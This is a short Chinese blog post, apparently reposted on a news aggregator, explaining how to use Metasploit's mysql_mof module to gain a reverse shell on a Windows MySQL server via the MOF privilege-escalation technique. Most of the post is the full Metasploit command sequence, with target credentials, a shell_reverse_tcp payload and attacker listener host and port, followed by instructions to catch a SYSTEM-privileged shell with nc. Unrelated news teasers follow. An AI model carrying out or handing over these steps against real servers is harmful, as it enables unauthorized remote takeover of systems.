mysql mof+metasploit反弹shell
admin
2023-05-15 07:02:04
0次
鉴于上篇文章 http://z2ppp.blog.51cto.com/11186185/1975985 mysql mof提权
metasploit已经有针对该方式的利用代码,原理还是一样生成mof文件,只是metasploit中可以使用到反弹技术,就不用额外添加用户,前提是对方服务器允许访问公网
use exploit/windows/mysql/mysql_mof set password xxx //设置登录mysql的密码 set username xxx //设置登录mysql的用户 set rhost xxx //设置要登录的ip地址 set rport xxxx //设置mysql的端口号 set payload windows/shell_reverse_tcp //所使用的反弹模块 set lhost xxx //反弹到的ip地址 set lport xxx //反弹到的端口 show options //设置完成后,使用该命令可查看设置参数情况 exploit //执行
如没问题,即exploit执行
这边我们使用nc监听对应端口号,就可以接收到shell了,通常情况为system权限,因为mof文件是由system执行
错误之处,敬请指正
上一篇:MySQL登录数据库 h参数
下一篇:Oracle中空值与数字相加问题
相关内容
热门资讯
英国绿党领袖:部长们应该做正确...
据凤凰卫视报道,英国工党首相斯塔默仍然面临严峻的党内逼宫压力。当地媒体指,超过半数工党下院议员希望他...
全民围观某君半蹲合影:我们崇拜...
马斯克打卡点:半蹲的不是膝盖,是整个科技行业的想象力 ——当某君半蹲合影、库克排队等待,科技大佬们的...
深圳第二类医疗器械备案所需材料...
办理深圳第二类医疗器械经营备案,最耗时间的就是材料准备。很多企业因为资料漏项、盖章错误、扫描模糊、填...
直击杭州人形机器人展:文旅物流...
《科创板日报》5月15日讯(记者 王耐)2026年第二届杭州国际人形机器人展,有600家上下游企业参...
“前半生是恶霸,后半生是学霸”...
一个人的逆袭叫传奇。一群人的集体转行,叫世道变了。文|张雪莹出品|Vista天下知识局提到日本黑帮,...
若不想成7年来第五个被赶下台的...
【文/观察者网 张菁娟】“这是自2022年保守党前首相特拉斯上任仅数周便仓促辞职以来,英国政局最动荡...
产学研各界代表齐聚一堂,共议A...
封面新闻记者 易弋力 20支战队4小时巅峰对决;三位大咖三个不同视角解读“技术打法+产业路径+数据洞...
评论丨香蕉复仇、蓝莓出轨?警惕...
AI技术降低了创作门槛,不等于降低了质量门槛和责任门槛;可以利用AI“手搓”短剧,但不应没下限地制造...
人工智能如何重塑电影行业?中国...
北京5月15日电 (记者 孙自法)人工智能生成内容(AIGC)正为众多行业带来深刻巨变,引发广泛关注...
济南隆超取得便捷式喷涂装置专利...
国家知识产权局信息显示,济南隆超石油机械锻造有限公司取得一项名为“一种便捷式喷涂装置”的专利,授权公...